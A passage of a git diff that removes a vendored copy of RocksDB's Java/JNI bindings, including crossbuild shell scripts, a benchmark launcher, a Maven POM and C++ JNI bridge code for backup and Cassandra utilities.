-sudo apt-get -y install git make gcc g++ libgflags-dev libsnappy-dev zlib1g-dev libbz2-dev default-jdk
-
-# set java home so we can build rocksdb jars
-export JAVA_HOME=$(echo /usr/lib/jvm/java-7-openjdk*)
-cd /rocksdb
-make jclean clean
-make -j 4 rocksdbjavastatic
-cp /rocksdb/java/target/librocksdbjni-* /rocksdb-build
-cp /rocksdb/java/target/rocksdbjni-* /rocksdb-build
-sudo shutdown -h now
-
diff --git a/thirdparty/rocksdb/java/crossbuild/docker-build-linux-centos.sh b/thirdparty/rocksdb/java/crossbuild/docker-build-linux-centos.sh
deleted file mode 100755
index 44a8bfe..0000000
--- a/thirdparty/rocksdb/java/crossbuild/docker-build-linux-centos.sh
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/usr/bin/env bash
-
-set -e
-
-rm -rf /rocksdb-local
-cp -r /rocksdb-host /rocksdb-local
-cd /rocksdb-local
-scl enable devtoolset-2 'make jclean clean'
-scl enable devtoolset-2 'PORTABLE=1 make rocksdbjavastatic'
-cp java/target/librocksdbjni-linux*.so java/target/rocksdbjni-*-linux*.jar /rocksdb-host/java/target
-
diff --git a/thirdparty/rocksdb/java/jdb_bench.sh b/thirdparty/rocksdb/java/jdb_bench.sh
deleted file mode 100755
index 9665de7..0000000
--- a/thirdparty/rocksdb/java/jdb_bench.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-PLATFORM=64
-if [ `getconf LONG_BIT` != "64" ]
-then
-  PLATFORM=32
-fi
-
-ROCKS_JAR=`find target -name rocksdbjni*.jar`
-
-echo "Running benchmark in $PLATFORM-Bit mode."
-java -server -d$PLATFORM -XX:NewSize=4m -XX:+AggressiveOpts -Djava.library.path=target -cp "${ROCKS_JAR}:benchmark/target/classes" org.rocksdb.benchmark.DbBenchmark $@
diff --git a/thirdparty/rocksdb/java/rocksjni.pom b/thirdparty/rocksdb/java/rocksjni.pom
deleted file mode 100644
index 94f0755..0000000
--- a/thirdparty/rocksdb/java/rocksjni.pom
+++ /dev/null
@@ -1,150 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project
-        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
-        xmlns="http://maven.apache.org/POM/4.0.0"
-        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
-    <modelVersion>4.0.0</modelVersion>
-    <name>RocksDB JNI</name>
-    <url>http://rocksdb.org/</url>
-    <groupId>org.rocksdb</groupId>
-    <artifactId>rocksdbjni</artifactId>
-    <!-- Version will be automatically replaced -->
-    <version>-</version>
-    <description>RocksDB fat jar that contains .so files for linux32 and linux64, jnilib files
-        for Mac OSX, and a .dll for Windows x64.
-    </description>
-    <licenses>
-        <license>
-            <name>Apache License 2.0</name>
-            <url>http://www.apache.org/licenses/LICENSE-2.0.html</url>
-            <distribution>repo</distribution>
-        </license>
-        <license>
-            <name>GNU General Public License, version 2</name>
-            <url>http://www.gnu.org/licenses/gpl-2.0.html</url>
-            <distribution>repo</distribution>
-        </license>
-    </licenses>
-    <scm>
-        <connection>scm:git:git://github.com/dropwizard/metrics.git</connection>
-        <developerConnection>scm:git:git@github.com:dropwizard/metrics.git</developerConnection>
-        <url>http://github.com/dropwizard/metrics/</url>
-        <tag>HEAD</tag>
-    </scm>
-    <developers>
-        <developer>
-            <name>Facebook</name>
-            <email>help@facebook.com</email>
-            <timezone>America/New_York</timezone>
-            <roles>
-                <role>architect</role>
-            </roles>
-        </developer>
-    </developers>
-
-    <properties>
-        <project.build.source>1.7</project.build.source>
-        <project.build.target>1.7</project.build.target>
-        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
-    </properties>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <version>3.2</version>
-                <configuration>
-                    <source>${project.build.source}</source>
-                    <target>${project.build.target}</target>
-                    <encoding>${project.build.sourceEncoding}</encoding>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>2.18.1</version>
-                <configuration>
-                    <argLine>${argLine} -ea -Xcheck:jni -Djava.library.path=${project.build.directory}</argLine>
-                    <useManifestOnlyJar>false</useManifestOnlyJar>  
-                    <useSystemClassLoader>false</useSystemClassLoader>
-                    <additionalClasspathElements>
-                        <additionalClasspathElement>${project.build.directory}/*</additionalClasspathElement>
-                    </additionalClasspathElements>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.jacoco</groupId>
-                <artifactId>jacoco-maven-plugin</artifactId>
-                <version>0.7.2.201409121644</version>
-                <executions>
-                    <execution>
-                        <goals>
-                            <goal>prepare-agent</goal>
-                        </goals>
-                    </execution>
-                    <execution>
-                        <id>report</id>
-                        <phase>prepare-package</phase>
-                        <goals>
-                            <goal>report</goal>
-                        </goals>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.codehaus.gmaven</groupId>
-                <artifactId>groovy-maven-plugin</artifactId>
-                <version>2.0</version>
-                <executions>
-                    <execution>
-                        <phase>process-classes</phase>
-                        <goals>
-                            <goal>execute</goal>
-                        </goals>
-                        <configuration>
-                            <defaults>
-                                <name>Xenu</name>
-                            </defaults>
-                            <source>
-                                String fileContents = new File(project.basedir.absolutePath + '/../include/rocksdb/version.h').getText('UTF-8')
-                                matcher = (fileContents =~ /(?s).*ROCKSDB_MAJOR ([0-9]+).*?/)
-                                String major_version = matcher.getAt(0).getAt(1)
-                                matcher = (fileContents =~ /(?s).*ROCKSDB_MINOR ([0-9]+).*?/)
-                                String minor_version = matcher.getAt(0).getAt(1)
-                                matcher = (fileContents =~ /(?s).*ROCKSDB_PATCH ([0-9]+).*?/)
-                                String patch_version = matcher.getAt(0).getAt(1)
-                                String version = String.format('%s.%s.%s', major_version, minor_version, patch_version)
-                                // Set version to be used in pom.properties
-                                project.version = version
-                                // Set version to be set as jar name
-                                project.build.finalName = project.artifactId + "-" + version
-                            </source>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-        </plugins>
-    </build>
-
-    <dependencies>
-        <dependency>
-            <groupId>junit</groupId>
-            <artifactId>junit</artifactId>
-            <version>4.12</version>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.assertj</groupId>
-            <artifactId>assertj-core</artifactId>
-            <version>1.7.1</version>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.mockito</groupId>
-            <artifactId>mockito-all</artifactId>
-            <version>1.10.19</version>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-</project>
diff --git a/thirdparty/rocksdb/java/rocksjni/backupablejni.cc b/thirdparty/rocksdb/java/rocksjni/backupablejni.cc
deleted file mode 100644
index 28db2b0..0000000
--- a/thirdparty/rocksdb/java/rocksjni/backupablejni.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::BackupEnginge and rocksdb::BackupableDBOptions methods
-// from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <vector>
-
-#include "include/org_rocksdb_BackupableDBOptions.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/utilities/backupable_db.h"
-
-///////////////////////////////////////////////////////////////////////////
-// BackupDBOptions
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    newBackupableDBOptions
- * Signature: (Ljava/lang/String;)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_newBackupableDBOptions(
-    JNIEnv* env, jclass jcls, jstring jpath) {
-  const char* cpath = env->GetStringUTFChars(jpath, nullptr);
-  if(cpath == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  auto* bopt = new rocksdb::BackupableDBOptions(cpath);
-  env->ReleaseStringUTFChars(jpath, cpath);
-  return reinterpret_cast<jlong>(bopt);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    backupDir
- * Signature: (J)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_BackupableDBOptions_backupDir(
-    JNIEnv* env, jobject jopt, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return env->NewStringUTF(bopt->backup_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupEnv
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupEnv(
-    JNIEnv* env, jobject jopt, jlong jhandle, jlong jrocks_env_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(jrocks_env_handle);
-  bopt->backup_env = rocks_env;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setShareTableFiles
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setShareTableFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->share_table_files = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    shareTableFiles
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_shareTableFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->share_table_files;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setInfoLog
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setInfoLog(
-  JNIEnv* env, jobject jobj, jlong jhandle, jlong jlogger_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* sptr_logger =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  bopt->info_log = sptr_logger->get();
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setSync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->sync = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    sync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_sync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->sync;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setDestroyOldData
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setDestroyOldData(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->destroy_old_data = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    destroyOldData
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_destroyOldData(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->destroy_old_data;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupLogFiles
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupLogFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->backup_log_files = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    backupLogFiles
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_backupLogFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->backup_log_files;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupRateLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jbackup_rate_limit) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->backup_rate_limit = jbackup_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    backupRateLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_backupRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->backup_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setBackupRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setBackupRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* sptr_rate_limiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(jrate_limiter_handle);
-  bopt->backup_rate_limiter = *sptr_rate_limiter;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setRestoreRateLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setRestoreRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrestore_rate_limit) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->restore_rate_limit = jrestore_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    restoreRateLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_restoreRateLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->restore_rate_limit;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setRestoreRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setRestoreRateLimiter(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrate_limiter_handle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  auto* sptr_rate_limiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(jrate_limiter_handle);
-  bopt->restore_rate_limiter = *sptr_rate_limiter;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setShareFilesWithChecksum
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setShareFilesWithChecksum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->share_files_with_checksum = flag;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    shareFilesWithChecksum
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_BackupableDBOptions_shareFilesWithChecksum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return bopt->share_files_with_checksum;
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setMaxBackgroundOperations
- * Signature: (JI)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setMaxBackgroundOperations(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_background_operations) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->max_background_operations =
-      static_cast<int>(max_background_operations);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    maxBackgroundOperations
- * Signature: (J)I
- */
-jint Java_org_rocksdb_BackupableDBOptions_maxBackgroundOperations(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return static_cast<jint>(bopt->max_background_operations);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    setCallbackTriggerIntervalSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_BackupableDBOptions_setCallbackTriggerIntervalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcallback_trigger_interval_size) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  bopt->callback_trigger_interval_size =
-      static_cast<uint64_t>(jcallback_trigger_interval_size);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    callbackTriggerIntervalSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_BackupableDBOptions_callbackTriggerIntervalSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  return static_cast<jlong>(bopt->callback_trigger_interval_size);
-}
-
-/*
- * Class:     org_rocksdb_BackupableDBOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_BackupableDBOptions_disposeInternal(
-    JNIEnv* env, jobject jopt, jlong jhandle) {
-  auto* bopt = reinterpret_cast<rocksdb::BackupableDBOptions*>(jhandle);
-  assert(bopt != nullptr);
-  delete bopt;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/backupenginejni.cc b/thirdparty/rocksdb/java/rocksjni/backupenginejni.cc
deleted file mode 100644
index 004de97..0000000
--- a/thirdparty/rocksdb/java/rocksjni/backupenginejni.cc
+++ /dev/null
@@ -1,236 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::BackupEngine methods from the Java side.
-
-#include <jni.h>
-#include <vector>
-
-#include "include/org_rocksdb_BackupEngine.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    open
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_BackupEngine_open(
-    JNIEnv* env, jclass jcls, jlong env_handle,
-    jlong backupable_db_options_handle) {
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(env_handle);
-  auto* backupable_db_options =
-      reinterpret_cast<rocksdb::BackupableDBOptions*>(
-      backupable_db_options_handle);
-  rocksdb::BackupEngine* backup_engine;
-  auto status = rocksdb::BackupEngine::Open(rocks_env,
-      *backupable_db_options, &backup_engine);
-
-  if (status.ok()) {
-    return reinterpret_cast<jlong>(backup_engine);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    createNewBackup
- * Signature: (JJZ)V
- */
-void Java_org_rocksdb_BackupEngine_createNewBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jlong db_handle,
-    jboolean jflush_before_backup) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(db_handle);
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status = backup_engine->CreateNewBackup(db,
-      static_cast<bool>(jflush_before_backup));
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    getBackupInfo
- * Signature: (J)Ljava/util/List;
- */
-jobject Java_org_rocksdb_BackupEngine_getBackupInfo(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  std::vector<rocksdb::BackupInfo> backup_infos;
-  backup_engine->GetBackupInfo(&backup_infos);
-  return rocksdb::BackupInfoListJni::getBackupInfo(env, backup_infos);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    getCorruptedBackups
- * Signature: (J)[I
- */
-jintArray Java_org_rocksdb_BackupEngine_getCorruptedBackups(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  std::vector<rocksdb::BackupID> backup_ids;
-  backup_engine->GetCorruptedBackups(&backup_ids);
-  // store backupids in int array
-  std::vector<jint> int_backup_ids(backup_ids.begin(), backup_ids.end());
-  
-  // Store ints in java array
-  // Its ok to loose precision here (64->32)
-  jsize ret_backup_ids_size = static_cast<jsize>(backup_ids.size());
-  jintArray ret_backup_ids = env->NewIntArray(ret_backup_ids_size);
-  if(ret_backup_ids == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  env->SetIntArrayRegion(ret_backup_ids, 0, ret_backup_ids_size,
-      int_backup_ids.data());
-  return ret_backup_ids;
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    garbageCollect
- * Signature: (J)V
- */
-void Java_org_rocksdb_BackupEngine_garbageCollect(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status = backup_engine->GarbageCollect();
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    purgeOldBackups
- * Signature: (JI)V
- */
-void Java_org_rocksdb_BackupEngine_purgeOldBackups(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jint jnum_backups_to_keep) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status =
-      backup_engine->
-          PurgeOldBackups(static_cast<uint32_t>(jnum_backups_to_keep));
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    deleteBackup
- * Signature: (JI)V
- */
-void Java_org_rocksdb_BackupEngine_deleteBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jint jbackup_id) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  auto status =
-      backup_engine->DeleteBackup(static_cast<rocksdb::BackupID>(jbackup_id));
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    restoreDbFromBackup
- * Signature: (JILjava/lang/String;Ljava/lang/String;J)V
- */
-void Java_org_rocksdb_BackupEngine_restoreDbFromBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jint jbackup_id,
-    jstring jdb_dir, jstring jwal_dir, jlong jrestore_options_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  const char* db_dir = env->GetStringUTFChars(jdb_dir, nullptr);
-  if(db_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, nullptr);
-  if(wal_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_dir, db_dir);
-    return;
-  }
-  auto* restore_options =
-      reinterpret_cast<rocksdb::RestoreOptions*>(jrestore_options_handle);
-  auto status =
-      backup_engine->RestoreDBFromBackup(
-          static_cast<rocksdb::BackupID>(jbackup_id), db_dir, wal_dir,
-          *restore_options);
-
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-  env->ReleaseStringUTFChars(jdb_dir, db_dir);
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    restoreDbFromLatestBackup
- * Signature: (JLjava/lang/String;Ljava/lang/String;J)V
- */
-void Java_org_rocksdb_BackupEngine_restoreDbFromLatestBackup(
-    JNIEnv* env, jobject jbe, jlong jbe_handle, jstring jdb_dir,
-    jstring jwal_dir, jlong jrestore_options_handle) {
-  auto* backup_engine = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  const char* db_dir = env->GetStringUTFChars(jdb_dir, nullptr);
-  if(db_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  const char* wal_dir = env->GetStringUTFChars(jwal_dir, nullptr);
-  if(wal_dir == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_dir, db_dir);
-    return;
-  }
-  auto* restore_options =
-      reinterpret_cast<rocksdb::RestoreOptions*>(jrestore_options_handle);
-  auto status =
-      backup_engine->RestoreDBFromLatestBackup(db_dir, wal_dir,
-          *restore_options);
-
-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-  env->ReleaseStringUTFChars(jdb_dir, db_dir);
-
-  if (status.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, status);
-}
-
-/*
- * Class:     org_rocksdb_BackupEngine
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_BackupEngine_disposeInternal(
-    JNIEnv* env, jobject jbe, jlong jbe_handle) {
-  auto* be = reinterpret_cast<rocksdb::BackupEngine*>(jbe_handle);
-  assert(be != nullptr);
-  delete be;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/cassandra_compactionfilterjni.cc b/thirdparty/rocksdb/java/rocksjni/cassandra_compactionfilterjni.cc
deleted file mode 100644
index 9d77559..0000000
--- a/thirdparty/rocksdb/java/rocksjni/cassandra_compactionfilterjni.cc
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CassandraCompactionFilter.h"
-#include "utilities/cassandra/cassandra_compaction_filter.h"
-
-/*
- * Class:     org_rocksdb_CassandraCompactionFilter
- * Method:    createNewCassandraCompactionFilter0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CassandraCompactionFilter_createNewCassandraCompactionFilter0(
-    JNIEnv* env, jclass jcls, jboolean purge_ttl_on_expiration) {
-  auto* compaction_filter =
-      new rocksdb::cassandra::CassandraCompactionFilter(purge_ttl_on_expiration);
-  // set the native handle to our native compaction filter
-  return reinterpret_cast<jlong>(compaction_filter);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/cassandra_value_operator.cc b/thirdparty/rocksdb/java/rocksjni/cassandra_value_operator.cc
deleted file mode 100644
index aa58ecc..0000000
--- a/thirdparty/rocksdb/java/rocksjni/cassandra_value_operator.cc
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <memory>
-
-#include "include/org_rocksdb_CassandraValueMergeOperator.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/cassandra/merge_operator.h"
-
-/*
- * Class:     org_rocksdb_CassandraValueMergeOperator
- * Method:    newSharedCassandraValueMergeOperator
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CassandraValueMergeOperator_newSharedCassandraValueMergeOperator
-(JNIEnv* env, jclass jclazz) {
-  auto* sptr_string_append_op = new std::shared_ptr<rocksdb::MergeOperator>(
-    rocksdb::CassandraValueMergeOperator::CreateSharedInstance());
-  return reinterpret_cast<jlong>(sptr_string_append_op);
-}
-
-/*
- * Class:     org_rocksdb_CassandraValueMergeOperator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CassandraValueMergeOperator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_string_append_op =
-      reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>* >(jhandle);
-  delete sptr_string_append_op;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/checkpoint.cc b/thirdparty/rocksdb/java/rocksjni/checkpoint.cc
deleted file mode 100644
index 426f5d0..0000000
--- a/thirdparty/rocksdb/java/rocksjni/checkpoint.cc
+++ /dev/null
@@ -1,68 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
